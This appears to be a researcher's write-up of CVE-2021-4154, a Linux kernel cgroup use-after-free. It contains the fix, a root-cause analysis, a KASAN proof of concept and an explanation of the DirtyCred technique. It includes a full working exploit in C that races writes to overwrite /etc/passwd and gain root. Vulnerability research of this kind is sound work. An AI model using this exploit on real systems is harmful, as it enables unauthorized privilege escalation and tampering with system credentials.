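CVE-2021-4154 is the first vulnerability used in the DirtyCred exploitation examples. The related slides, paper, and source code are:
Slides - BlackHat USA 2022 - Cautious! A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe
Paper - DirtyCred: Escalating Privilege in Linux Kernel
GitHub - Markakd/DirtyCred
Besides the DirtyCred method, this vulnerability can also be exploited with the conventional cross-cache approach (a more involved process).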
Vulnerability analysis
Vulnerability information: cgroup: verify that source is a string
The fix patch is:
    @@ -912,6 +912,8 @@ int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
         opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
         if (opt == -ENOPARAM) {
             if (strcmp(param->key, "source") == 0) {
    +            if (param->type != fs_value_is_string)
    +                return invalf(fc, "Non-string source");
                 if (fc->source)
                     return invalf(fc, "Multiple sources not supported");
                 fc->source = param->string;
A PoC snippet:

    int fscontext_fd = fsopen("cgroup", 0);
    int fd_null = open("/dev/null", O_RDONLY);
    fsconfig(fscontext_fd, FSCONFIG_SET_FD, "source", NULL, fd_null);
    close_range(3, ~0U, 0);  // closing fscontext_fd frees the struct file behind fd_null, producing a UAF
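The bug is in the handling of the fsconfig system call: it treats the struct file behind the descriptor fd_null as a pointer to a heap buffer holding a string. In other words, it confuses fs_parameter->file with fs_parameter->string in the following structure: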
    struct fs_parameter {
        const char          *key;
        enum fs_value_type  type:8;
        union {
            char            *string;
            void            *blob;
            struct filename *name;
            struct file     *file;
        };
        size_t  size;
        int     dirfd;
    };
As a result, a struct file pointer is assigned to fc->source. When close(fscontext_fd) is called, fc->source (that is, the struct file behind fd_null) is freed, yet fd_null is still in use, so a UAF occurs.
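The lifetime problem can be modeled in user space. The sketch below is only an illustration: fake_file, fake_fs_context and the helper functions are hypothetical names, and the object is flagged as freed rather than actually released so that the stale reference can be observed safely.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct file: one reference, held by the fd table. */
struct fake_file {
    int  refcount;
    bool freed;      /* set instead of really freeing, so the model stays safe */
};

/* Hypothetical stand-in for struct fs_context. */
struct fake_fs_context {
    void *source;    /* in the kernel this is a char * released with kfree() */
};

/* Models the buggy assignment: the pointer is stored without taking a reference. */
static void fake_set_source(struct fake_fs_context *fc, struct fake_file *f)
{
    fc->source = f;              /* refcount stays at 1 */
}

/* Models put_fs_context(): releases fc->source unconditionally. */
static void fake_put_fs_context(struct fake_fs_context *fc)
{
    struct fake_file *f = fc->source;

    if (f)
        f->freed = true;         /* corresponds to kfree(fc->source) */
    fc->source = NULL;
}

/* True if the fd table still references an object that has been freed. */
static bool fd_is_dangling(const struct fake_file *f)
{
    assert(f != NULL);
    return f->freed && f->refcount > 0;
}
```

After fake_set_source() followed by fake_put_fs_context(), fd_is_dangling() reports true: the object is gone while its only legitimate owner still holds a reference.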
Tracing how the UAF forms:
First, the assignment to fc->source. The fsconfig call path is:
    SYSCALL_DEFINE5(fsconfig, int, fd, unsigned int, cmd, const char __user *, _key,
                    const void __user *, _value, int, aux)
        vfs_fsconfig_locked(fc, cmd, &param);
            vfs_parse_fs_param(fc, param);
                fc->ops->parse_param(fc, param);
                    cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
Next, the free site. After user space runs close(fscontext_fd), the kernel call path is:
    fscontext_release()
        put_fs_context()
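From the code-logic point of view:
For the key "source", the cgroup v1 fs parser assumes that the supplied value is a string. In the actual implementation, however, a call that names the key "source" but supplies a file descriptor (FSCONFIG_SET_FD, with the descriptor passed in aux) also reaches the cgroup1_parse_param() branch. The bug therefore comes from assuming that the type for "source" is always fs_value_is_string, when it can also be fs_value_is_file.
From the point of view of the fs_parameter structure:
When the union inside fs_parameter is used, the member to read should be chosen according to param->type. The parsing code in cgroup1_parse_param() never checks param->type; it simply treats the value as param->string and assigns it to fc->source, which is how a struct file pointer ends up in fc->source.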
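The tag-check idea behind the fix can be shown with a small user-space sketch. The type and function names here (value_type, param, source_unchecked, source_checked) are made up for illustration and only mirror the shape of the kernel structures.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Simplified, hypothetical mirror of enum fs_value_type. */
enum value_type { VALUE_IS_STRING, VALUE_IS_FILE };

struct param {
    const char     *key;
    enum value_type type;
    union {
        char *string;
        void *file;      /* stands in for struct file * */
    };
};

/* Unchecked variant: reads the union as a string whatever the tag says. */
static const char *source_unchecked(const struct param *p)
{
    return p->string;
}

/* Checked variant: follows the idea of the fix and rejects non-string values. */
static int source_checked(const struct param *p, const char **out)
{
    assert(p != NULL && out != NULL);
    if (p->type != VALUE_IS_STRING)
        return -EINVAL;
    *out = p->string;
    return 0;
}
```

With a parameter tagged VALUE_IS_FILE, source_unchecked() hands back the file pointer as if it were a string, while source_checked() returns an error and leaves the output untouched.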
PoC
The PoC uses two functions, fsopen() and fsconfig(). Their kernel prototypes are:
    asmlinkage long sys_fsopen(const char __user *fs_name, unsigned int flags);

    asmlinkage long sys_fsconfig(int fs_fd, unsigned int cmd, const char __user *key,
                                 const void __user *value, int aux);
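Older C libraries ship no wrappers for these two system calls, so they are usually invoked through syscall(). A minimal sketch of such wrappers follows; the x_ prefixed names are made up here to avoid clashing with <linux/mount.h>, the command values follow the kernel's enum fsconfig_command, and the fallback syscall numbers are the ones the exploit later in this post also uses.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Fallback numbers, used only when the libc headers do not define them. */
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif

/* Values of the kernel's enum fsconfig_command, renamed with an X_ prefix. */
enum x_fsconfig_command {
    X_FSCONFIG_SET_FLAG        = 0,
    X_FSCONFIG_SET_STRING      = 1,
    X_FSCONFIG_SET_BINARY      = 2,
    X_FSCONFIG_SET_PATH        = 3,
    X_FSCONFIG_SET_PATH_EMPTY  = 4,
    X_FSCONFIG_SET_FD          = 5,   /* the literal 5 passed by the PoC */
    X_FSCONFIG_CMD_CREATE      = 6,
    X_FSCONFIG_CMD_RECONFIGURE = 7,
};

/* Thin wrapper: returns a filesystem-context fd, or -1 with errno set. */
static int x_fsopen(const char *fs_name, unsigned int flags)
{
    assert(fs_name != NULL);
    return (int)syscall(__NR_fsopen, fs_name, flags);
}

/* Thin wrapper: for X_FSCONFIG_SET_FD the descriptor goes in aux and value is NULL. */
static int x_fsconfig(int fs_fd, unsigned int cmd, const char *key,
                      const void *value, int aux)
{
    return (int)syscall(__NR_fsconfig, fs_fd, cmd, key, value, aux);
}
```

With these, the trigger call reads x_fsconfig(fd, X_FSCONFIG_SET_FD, "source", NULL, fd_null), which makes it easier to see that a descriptor, not a string, is being supplied for "source".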
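The full PoC is below. After compiling and running it, the UAF report appears in dmesg (provided the kernel was built with KASAN; otherwise the bug is not detected).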
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <stdarg.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <sched.h>
    #include <string.h>
    #include <ctype.h>
    #include <pthread.h>
    #include <sys/mman.h>
    #include <sys/syscall.h>

    static void die(const char *fmt, ...)
    {
        va_list params;

        va_start(params, fmt);
        vfprintf(stderr, fmt, params);
        va_end(params);
        exit(1);
    }

    /* Enter new user/mount/net namespaces and map the current uid/gid to 0 inside them. */
    void init_namespace(void)
    {
        int fd;
        char buff[0x100];

        uid_t uid = getuid();
        gid_t gid = getgid();

        if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
            die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
        }

        if (unshare(CLONE_NEWNET)) {
            die("unshare(CLONE_NEWNET): %m");
        }

        fd = open("/proc/self/setgroups", O_WRONLY);
        snprintf(buff, sizeof(buff), "deny");
        write(fd, buff, strlen(buff));
        close(fd);

        fd = open("/proc/self/uid_map", O_WRONLY);
        snprintf(buff, sizeof(buff), "0 %d 1", uid);
        write(fd, buff, strlen(buff));
        close(fd);

        fd = open("/proc/self/gid_map", O_WRONLY);
        snprintf(buff, sizeof(buff), "0 %d 1", gid);
        write(fd, buff, strlen(buff));
        close(fd);
    }

    int main()
    {
        init_namespace();

        int fd_fscontext = syscall(__NR_fsopen, "cgroup", 0);
        if (fd_fscontext < 0) {
            perror("fsopen");
            die("");
        }

        int fd_null = open("/dev/null", O_RDONLY);
        /* 5 is FSCONFIG_SET_FD: "source" is given a descriptor instead of a string */
        syscall(__NR_fsconfig, fd_fscontext, 5, "source", 0, fd_null);

        close(fd_fscontext);    /* frees fc->source, i.e. the struct file behind fd_null */
        close(fd_null);         /* touches the freed struct file */
    }
The output in dmesg is:
    [ 1785.655850] ==================================================================
    [ 1785.658925] BUG: KASAN: use-after-free in filp_close+0x26/0xb0
    [ 1785.661875] Read of size 8 at addr ffff8883cd692c78 by task test/2163

    [ 1785.667787] CPU: 6 PID: 2163 Comm: test Tainted: G L 5.4.0 #2
    [ 1785.667790] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
    [ 1785.667793] Call Trace:
    [ 1785.667808] dump_stack+0x96/0xca
    [ 1785.667818] print_address_description.constprop.0+0x20/0x210
    [ 1785.667824] ? filp_close+0x26/0xb0
    [ 1785.667828] __kasan_report.cold+0x1b/0x41
    [ 1785.667832] ? filp_close+0x26/0xb0
    [ 1785.667836] kasan_report+0x12/0x20
    [ 1785.667841] check_memory_region+0x129/0x1b0
    [ 1785.667845] __kasan_check_read+0x11/0x20
    [ 1785.667848] filp_close+0x26/0xb0
    [ 1785.667854] __close_fd+0x11d/0x150
    [ 1785.667858] __x64_sys_close+0x40/0x80
    [ 1785.667865] do_syscall_64+0x72/0x210
    [ 1785.667870] entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 1785.667876] RIP: 0033:0x7fe01ac4a817
    [ 1785.667883] Code: ff ff e8 7c 12 02 00 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 41 c3 48 83 ec 18 89 7c 24 0c e8 b3 5d f8 ff
    [ 1785.667885] RSP: 002b:00007ffeba9710a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003
    [ 1785.667891] RAX: ffffffffffffffda RBX: 000055e759df2640 RCX: 00007fe01ac4a817
    [ 1785.667893] RDX: 000055e759df311a RSI: 0000000000000005 RDI: 0000000000000004
    [ 1785.667895] RBP: 00007ffeba9710c0 R08: 0000000000000004 R09: 00007ffeba9711b0
    [ 1785.667897] R10: 0000000000000000 R11: 0000000000000246 R12: 000055e759df21e0
    [ 1785.667900] R13: 00007ffeba9711b0 R14: 0000000000000000 R15: 0000000000000000

    [ 1785.670155] Allocated by task 2163:
    [ 1785.672385] save_stack+0x23/0x90
    [ 1785.672389] __kasan_kmalloc.constprop.0+0xcf/0xe0
    [ 1785.672393] kasan_slab_alloc+0xe/0x10
    [ 1785.672396] kmem_cache_alloc+0xce/0x240
    [ 1785.672400] __alloc_file+0x2b/0x1c0
    [ 1785.672402] alloc_empty_file+0x46/0xc0
    [ 1785.672407] path_openat+0xd1/0x22f0
    [ 1785.672410] do_filp_open+0x12b/0x1c0
    [ 1785.672413] do_sys_open+0x1fb/0x2f0
    [ 1785.672417] __x64_sys_openat+0x59/0x70
    [ 1785.672421] do_syscall_64+0x72/0x210
    [ 1785.672425] entry_SYSCALL_64_after_hwframe+0x44/0xa9

    [ 1785.674579] Freed by task 2163:
    [ 1785.676657] save_stack+0x23/0x90
    [ 1785.676661] __kasan_slab_free+0x137/0x180
    [ 1785.676664] kasan_slab_free+0xe/0x10
    [ 1785.676667] kfree+0x98/0x260
    [ 1785.676671] put_fs_context+0x16f/0x210
    [ 1785.676674] fscontext_release+0x35/0x40
    [ 1785.676678] __fput+0x16e/0x3a0
    [ 1785.676680] ____fput+0xe/0x10
    [ 1785.676686] task_work_run+0xc0/0xe0
    [ 1785.676690] exit_to_usermode_loop+0x187/0x1c0
    [ 1785.676693] do_syscall_64+0x1e0/0x210
    [ 1785.676697] entry_SYSCALL_64_after_hwframe+0x44/0xa9

    [ 1785.678642] The buggy address belongs to the object at ffff8883cd692c40 which belongs to the cache filp(1119:session-1.scope) of size 256
    [ 1785.683211] The buggy address is located 56 bytes inside of 256-byte region [ffff8883cd692c40, ffff8883cd692d40)
    [ 1785.687552] The buggy address belongs to the page:
    [ 1785.689679] page:ffffea000f35a400 refcount:1 mapcount:0 mapping:ffff8883cfa661c0 index:0xffff8883cd6952c0 compound_mapcount: 0
    [ 1785.689687] raw: 0017ffffc0010200 ffffea000cd81008 ffff8883d45ace50 ffff8883cfa661c0
    [ 1785.689692] raw: ffff8883cd6952c0 00000000002e001f 00000001ffffffff 0000000000000000
    [ 1785.689694] page dumped because: kasan: bad access detected

    [ 1785.691712] Memory state around the buggy address:
    [ 1785.693790]  ffff8883cd692b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
    [ 1785.695944]  ffff8883cd692b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
    [ 1785.698214] >ffff8883cd692c00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
    [ 1785.699548]                                                                 ^
    [ 1785.701820]  ffff8883cd692c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    [ 1785.703994]  ffff8883cd692d00: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
    [ 1785.706162] ==================================================================
    [ 1785.708370] Disabling lock debugging due to kernel taint
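Exploitation method - DirtyCred
The exploitation logic is described with a few figures:
First, how the UAF arises
Then, the exploitation idea under ideal conditions
Following the DirtyCred approach: in the gap between the permission check on the file and the actual write, replace the struct file with that of a privileged file the attacker has no write permission on.
However, the window between "check" and "write" is far too small to exploit reliably.
Finally, the exploitation idea with a lengthened TOCTOU window
Starting from the original author's exp, I made a few changes and wrote a shorter, more readable version. The main differences are:
It uses a self-contained helper function to create the namespaces
It uses the more common write() instead of writev()
It shrinks the written data to 1G, which shortens the exp's run time while leaving a window that is still ample for exploitation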
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <stdarg.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <sched.h>
    #include <string.h>
    #include <ctype.h>
    #include <pthread.h>
    #include <assert.h>
    #include <sys/mman.h>
    #include <sys/syscall.h>
    #include <sys/uio.h>
    #include <sys/stat.h>
    #include <linux/kcmp.h>

    #ifndef __NR_fsconfig
    #define __NR_fsconfig 431
    #endif
    #ifndef __NR_fsopen
    #define __NR_fsopen 430
    #endif

    #define NR_PAGE 0x40000
    #define MAX_FILE_NUM 1000

    int uaf_fd;
    int fds[MAX_FILE_NUM];

    /* flags polled across threads, hence volatile */
    volatile int run_write = 0;
    volatile int run_spray = 0;

    static void die(const char *fmt, ...)
    {
        va_list params;

        va_start(params, fmt);
        vfprintf(stderr, fmt, params);
        va_end(params);
        exit(1);
    }

    void init_namespace(void)
    {
        int fd;
        char buff[0x100];

        uid_t uid = getuid();
        gid_t gid = getgid();

        if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
            die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m \n");
        }

        if (unshare(CLONE_NEWNET)) {
            die("unshare(CLONE_NEWNET): %m \n");
        }

        fd = open("/proc/self/setgroups", O_WRONLY);
        snprintf(buff, sizeof(buff), "deny");
        write(fd, buff, strlen(buff));
        close(fd);

        fd = open("/proc/self/uid_map", O_WRONLY);
        snprintf(buff, sizeof(buff), "0 %d 1", uid);
        write(fd, buff, strlen(buff));
        close(fd);

        fd = open("/proc/self/gid_map", O_WRONLY);
        snprintf(buff, sizeof(buff), "0 %d 1", gid);
        write(fd, buff, strlen(buff));
        close(fd);
    }

    static void use_temporary_dir(void)
    {
        system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
        char *tmpdir = "exp_dir";
        if (!tmpdir)
            exit(1);
        if (chmod(tmpdir, 0777))
            exit(1);
        if (chdir(tmpdir))
            exit(1);
    }

    void trigger()
    {
        int fs_fd = syscall(__NR_fsopen, "cgroup", 0);
        if (fs_fd < 0) {
            perror("fsopen");
            die("");
        }

        symlink("./data", "./uaf");

        uaf_fd = open("./uaf", 1);
        if (uaf_fd < 0) {
            die("failed to open symbolic file\n");
        }

        /* 5 is FSCONFIG_SET_FD */
        if (syscall(__NR_fsconfig, fs_fd, 5, "source", 0, uaf_fd)) {
            perror("fsconfig");
            exit(-1);
        }
        close(fs_fd);    /* frees the struct file behind uaf_fd */
    }

    void *slow_write(void *arg)
    {
        (void)arg;
        printf("[*] start slow write to get the lock\n");
        int fd = open("./uaf", 1);
        if (fd < 0) {
            perror("error open uaf file");
            exit(-1);
        }

        unsigned long int addr = 0x30000000;
        int offset;
        for (offset = 0; offset < NR_PAGE; offset++) {
            void *r = mmap((void *)(addr + offset * 0x1000), 0x1000,
                           PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
            if (r == MAP_FAILED) {
                printf("allocate failed at 0x%x\n", offset);
            }
        }
        assert(offset > 0);

        uint64_t wr_len = (NR_PAGE - 1) * 0x1000;

        run_write = 1;
        /* the large write holds the inode lock for a long time */
        if (write(fd, (void *)addr, wr_len) < 0) {
            perror("slow write");
        }

        printf("[*] write done!\n");
        close(fd);
        return NULL;
    }

    void *write_cmd(void *arg)
    {
        (void)arg;
        char data[1024] = "bling:x:0:0:root:/home/bling:/bin/bash\nroot:x:0:0:root:/root:/bin/bash\n";

        while (!run_write) {}
        run_spray = 1;
        /* passes the f_mode check, then waits on the inode lock held by slow_write */
        if (write(uaf_fd, data, strlen(data)) < 0) {
            printf("failed to write\n");
        }
        printf("[*] overwrite done! It should be after the slow write\n");
        return NULL;
    }

    void spray_files()
    {
        int found = 0;

        while (!run_spray) {}

        printf("[*] got uaf fd %d, start spray....\n", uaf_fd);
        for (int i = 0; i < MAX_FILE_NUM; i++) {
            fds[i] = open("/etc/passwd", O_RDONLY);
            if (fds[i] < 0) {
                perror("open file");
                printf("%d\n", i);
            }
            /* kcmp returns 0 when both descriptors refer to the same struct file */
            if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, fds[i]) == 0) {
                found = 1;
                printf("[!] found, file id %d\n", i);
                for (int j = 0; j < i; j++)
                    close(fds[j]);
                break;
            }
        }

        if (found == 0) {
            printf("spray failed, try again!\n");
        }
    }

    int main()
    {
        pthread_t p_id, p_id_cmd;

        use_temporary_dir();
        init_namespace();
        trigger();

        pthread_create(&p_id, NULL, slow_write, NULL);
        usleep(1);
        pthread_create(&p_id_cmd, NULL, write_cmd, NULL);

        spray_files();

        pthread_exit(NULL);
        return 0;
    }
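The "1G" figure follows directly from the constants in the code above. A small sketch of the arithmetic (the helper names are made up; the 4 KiB page size is the one assumed by the exploit's mmap loop):

```c
#include <assert.h>
#include <stdint.h>

#define NR_PAGE 0x40000u   /* same value as in the exploit above */
#define PAGE_SZ 0x1000u    /* 4 KiB, the step used by the mmap loop */

/* Bytes mapped by the loop: NR_PAGE pages starting at 0x30000000. */
static uint64_t mapped_bytes(void)
{
    return (uint64_t)NR_PAGE * PAGE_SZ;
}

/* Length handed to write(): one page less than the mapping. */
static uint64_t slow_write_len(void)
{
    assert(NR_PAGE > 0);
    return (uint64_t)(NR_PAGE - 1) * PAGE_SZ;
}
```

mapped_bytes() is 0x40000000, exactly 1 GiB, and slow_write_len() is 0x3ffff000, one page short of that. Changing NR_PAGE scales the time the slow write holds the inode lock accordingly.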
In a virtual machine running Ubuntu Server 20.04, the exploit successfully overwrote /etc/passwd and escalated privileges:
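Exploitation method - cross-cache
TODO...
This approach reminds me of the kcache challenge from D3CTF a while ago, which I did not manage to solve... cross cache + msgmsg + pipe buffer... I will set it aside for now.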
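Self Q&A
Where are "check" and "write" in write(v)?
The "check" point is where the permission of the file itself is validated, i.e. whether file->f_mode carries the write flag. The "write" point is where the write is actually performed.
For the former, write and writev use different functions; for the latter, both end up in the write function of the underlying filesystem.
Kernel entry points for the read/write/readv/writev system calls: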
    writev -> do_writev
    readv  -> do_readv
    write  -> ksys_write
    read   -> ksys_read
    open   -> do_sys_open
Taking Linux 5.4.0 as an example, let us trace the "check" and "write" points in the handling of the writev and write system calls.
"check" locations:
    /* writev path */
    static ssize_t do_iter_write(struct file *file, struct iov_iter *iter,
                                 loff_t *pos, rwf_t flags)
    {
        /* ... */
        if (!(file->f_mode & FMODE_WRITE))
            return -EBADF;
        if (!(file->f_mode & FMODE_CAN_WRITE))
            return -EINVAL;
        /* ... */
        if (file->f_op->write_iter)
            ret = do_iter_readv_writev(file, iter, pos, WRITE, flags);
        /* ... */
        return ret;
    }

    /* write path */
    ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
    {
        /* ... */
        if (!(file->f_mode & FMODE_WRITE))
            return -EBADF;
        if (!(file->f_mode & FMODE_CAN_WRITE))
            return -EINVAL;
        /* ... */
        else if (file->f_op->write_iter)
            ret = new_sync_write(file, buf, count, pos);
        /* ... */
        return ret;
    }
"write" location:
    static ssize_t ext4_buffered_write_iter(struct kiocb *iocb, struct iov_iter *from)
    {
        /* ... */
        inode_lock(inode);
        /* ... */
        ret = generic_perform_write(iocb->ki_filp, from, iocb->ki_pos);
        /* ... */
    out:
        inode_unlock(inode);
        /* ... */
        return ret;
    }
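So in the exploit, one thread delays the execution of inode_unlock(inode) by writing a large file, and the other thread stalls at inode_lock(inode) while waiting for the lock. This yields the sequence "check" -> pause -> "write". With the two threads working together, the size of the large file determines the length of the TOCTOU window.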
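The "check" -> pause -> "write" ordering can be written out as a sequential user-space model. This is a deliberately simplified sketch with hypothetical names (fake_file, check_phase, reuse_slot, write_phase); there are no real threads or locks here, only the order of events that the inode lock imposes on the second writer.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Hypothetical stand-in for one struct file slot in the filp cache. */
struct fake_file {
    bool writable;      /* models FMODE_WRITE in f_mode */
    char target[16];    /* which file this object refers to */
    char content[16];   /* models the file's data */
};

/* "check": done once, before the writer starts waiting for the inode lock. */
static bool check_phase(const struct fake_file *f)
{
    return f->writable;
}

/* Models the slot being freed and reallocated for a read-only privileged file. */
static void reuse_slot(struct fake_file *slot)
{
    slot->writable = false;
    strcpy(slot->target, "/etc/passwd");
    strcpy(slot->content, "original");
}

/* "write": done after the lock is obtained; the mode is not examined again. */
static void write_phase(struct fake_file *f, const char *data)
{
    assert(strlen(data) < sizeof(f->content));
    strcpy(f->content, data);
}

/* Runs the three steps in the order the exploit forces them to happen. */
static bool run_interleaving(struct fake_file *slot)
{
    if (!check_phase(slot))        /* 1. passes: the slot is still the writable file */
        return false;
    reuse_slot(slot);              /* 2. happens while the writer waits on the lock */
    write_phase(slot, "new data"); /* 3. lands in the read-only file */
    return true;
}
```

Starting from a writable slot for ./data, run_interleaving() ends with a slot that says it is read-only and refers to /etc/passwd, yet holds the new content.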
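Why writev rather than write?
write works as well.
In the scenario of Jann Horn's double-put exploit, writev is required, because that exploit makes the kernel thread pause while the kernel is reading the iovec structures.
In this exploit, the kernel thread pauses inside ext4_file_write_iter(), which is the same for writev and write; both reach that branch.
Since it makes no difference whether writev or write is used, my exp uses the more familiar write().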
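Why create a symlink to write through?
To bypass the lock in __fdget_pos().
Whether a file is written with write() or writev(), the call goes through fdget_pos(). This function decides, based on the file mode (file->f_mode), whether to take the lock file->f_pos_lock. When file->f_mode contains FMODE_ATOMIC_POS (and the file's reference count is greater than 1), it takes file->f_pos_lock, keeping other threads out.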
    static inline struct fd fdget_pos(int fd)
    {
        return __to_fd(__fdget_pos(fd));
    }

    unsigned long __fdget_pos(unsigned int fd)
    {
        unsigned long v = __fdget(fd);
        struct file *file = (struct file *)(v & ~3);

        if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
            if (file_count(file) > 1) {
                v |= FDPUT_POS_UNLOCK;
                mutex_lock(&file->f_pos_lock);
            }
        }
        return v;
    }

    #define FMODE_ATOMIC_POS    ((__force fmode_t)0x8000)
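At this point, however, the write-permission check has not yet been performed. The exploit needs a lock that is taken after the permission check; the lock in fdget_pos() would prevent us from widening the TOCTOU window, so a way around it is needed.
Where does FMODE_ATOMIC_POS come from? When we open() a file, the following function is reached. If the file's inode is a regular file or a directory, FMODE_ATOMIC_POS is added to the file's f_mode.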
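A side note on the v & ~3 and v |= FDPUT_POS_UNLOCK expressions in __fdget_pos(): the return value is a pointer with flags packed into its two low bits. A minimal user-space sketch of that technique follows; the X_ prefixed constants and the pack/unpack helpers are named here for illustration only.

```c
#include <assert.h>
#include <stdint.h>

#define X_FDPUT_FPUT        1ul   /* bit 0 */
#define X_FDPUT_POS_UNLOCK  2ul   /* bit 1 */

/* Any object aligned to at least 4 bytes has an address whose low two bits are zero. */
struct obj { long payload; };

/* Combine an aligned pointer and up to two flag bits into one word. */
static uintptr_t pack(struct obj *p, unsigned long flags)
{
    assert(((uintptr_t)p & 3) == 0);
    assert((flags & ~3ul) == 0);
    return (uintptr_t)p | flags;
}

/* Recover the pointer by masking the flag bits off, as v & ~3 does. */
static struct obj *unpack_ptr(uintptr_t v)
{
    return (struct obj *)(v & ~(uintptr_t)3);
}

/* Recover the flag bits. */
static unsigned long unpack_flags(uintptr_t v)
{
    return (unsigned long)(v & 3);
}
```

The caller later inspects the flag bits to decide whether f_pos_lock has to be released again, without needing a second return value.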
    static int do_dentry_open(struct file *f, struct inode *inode,
                              int (*open)(struct inode *, struct file *))
    {
        /* ... */
        if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
            f->f_mode |= FMODE_ATOMIC_POS;
        /* ... */
    }

    S_ISLNK(st_mode)     /* symbolic link */
    S_ISREG(st_mode)     /* regular file */
    S_ISDIR(st_mode)     /* directory */
    S_ISCHR(st_mode)     /* character device */
    S_ISBLK(st_mode)     /* block device */
    S_ISFIFO(st_mode)    /* FIFO (named pipe) */
    S_ISSOCK(st_mode)    /* socket */
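So the exploit creates a symlink to the file to be written and opens the symlink for writing. The intent is to keep FMODE_ATOMIC_POS out of f_mode and thereby skip the lock acquisition in fdget_pos().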
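The S_IS* macros can be tried out from user space. In the minimal sketch below (probe_types is a made-up helper, and the data/uaf file names are borrowed from the exploit), lstat() on the link path reports a symbolic link, while fstat() on a descriptor obtained with a plain open() of the same path reports the type of the target, because open() follows the link unless O_NOFOLLOW is passed. Which inode type do_dentry_open() actually sees for a given open() call is therefore worth confirming on the kernel under test.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Creates a temporary directory holding "data" and a symlink "uaf" -> "data",
 * then records what lstat() says about the link path and what fstat() says
 * about a descriptor opened through the link. Returns 0 on success, -1 on failure.
 */
static int probe_types(int *path_is_lnk, int *fd_is_reg)
{
    char dir[] = "/tmp/symlink-probe-XXXXXX";
    char data[64], lnk[64];
    struct stat st;
    int fd, ret = -1;

    assert(path_is_lnk != NULL && fd_is_reg != NULL);
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(data, sizeof(data), "%s/data", dir);
    snprintf(lnk, sizeof(lnk), "%s/uaf", dir);

    fd = open(data, O_CREAT | O_WRONLY, 0600);
    if (fd < 0)
        goto out;
    close(fd);
    if (symlink("data", lnk) != 0)
        goto out;

    if (lstat(lnk, &st) != 0)            /* examines the link itself */
        goto out;
    *path_is_lnk = S_ISLNK(st.st_mode) ? 1 : 0;

    fd = open(lnk, O_WRONLY);            /* no O_NOFOLLOW: the link is followed */
    if (fd < 0)
        goto out;
    if (fstat(fd, &st) == 0) {           /* examines the opened file */
        *fd_is_reg = S_ISREG(st.st_mode) ? 1 : 0;
        ret = 0;
    }
    close(fd);
out:
    unlink(lnk);
    unlink(data);
    rmdir(dir);
    return ret;
}
```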
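References
CVE-2021-4154: wrongly freeing an arbitrary file object - DirtyCred exploitation
Linux filesystems: mount
The new-generation mount system calls (1): a first look at the interface
[C language] Common macros such as S_ISDIR and S_ISREG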
kcmp(2) — Linux manual page